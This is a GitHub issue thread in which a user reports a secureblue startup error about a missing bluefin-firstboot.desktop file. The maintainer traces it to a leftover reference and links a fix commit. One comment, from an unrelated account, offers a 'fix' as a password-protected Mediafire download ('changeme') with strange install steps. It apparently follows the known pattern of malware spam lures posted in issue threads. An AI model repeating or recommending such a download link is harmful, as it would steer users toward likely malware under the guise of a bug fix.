### ISSUE TITLE
[BUG] cannot stat bluefin-firstboot.desktop

### ISSUE THREAD

**Issue by Bammede** [secureblue/secureblue#398]
**Describe the bug**
In Terminal, above "Welcome to secureblue!" there is a message (1st line in the window):

`cp: cannot stat '/etc/skel/.config/autostart/bluefin-firstboot.desktop': No such file or directory`

**To Reproduce**
1. Install bluefin-main-hardened or bluefin-nvidia-hardened
2. Setup yafti
3. Open Terminal

**Expected behavior**
This error should be removed.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by RoyalOughtness** [comment]
@Bammede Please do not skip steps in the bug report template. Specifically, please provide the following information from the bug report template:

- Confirm you cannot repro on the ublue Bluefin image

**Comment by Bammede** [comment]
Confirmed: Bluefin is fine. Secureblue has error.

**Comment by RoyalOughtness** [comment]
@Bammede what's the output of `ujust check-local-overrides` ?

**Comment by Bammede** [comment]
@qoijjj What exactly want to know about local overrides? I checked the output, there is nothing about 'bluefin-firstboot.desktop'.

**Comment by RoyalOughtness** [comment]
does `/usr/etc/skel/.config/autostart/bluefin-firstboot.desktop` exist?

**Comment by Bammede** [comment]
Now it does not.
`cp: cannot stat '/etc/skel/.config/autostart/bluefin-firstboot.desktop': No such file or directory`

I just found this in bluefin repo, but in my image Bluefin-hardened there is no file.
https://github.com/ublue-os/bluefin/blob/8391f69899a5856018d7894317fb5dc1bec3a1ca/system_files/shared/etc/skel/.config/autostart/bluefin-firstboot.desktop

**Comment by RoyalOughtness** [comment]
i said `/usr/etc/skel/.config/autostart/bluefin-firstboot.desktop`.

**Comment by Bammede** [comment]
No, there is no file there.

**Comment by RoyalOughtness** [comment]
Ah okay, yeah I forgot we remove this file but we omitted removing the reference to it. I'll fix this. Thanks for the report.

**Comment by RoyalOughtness** [comment]
https://github.com/secureblue/secureblue/commit/d5be94b441d8626f76a0793411a37d8575a7dba7
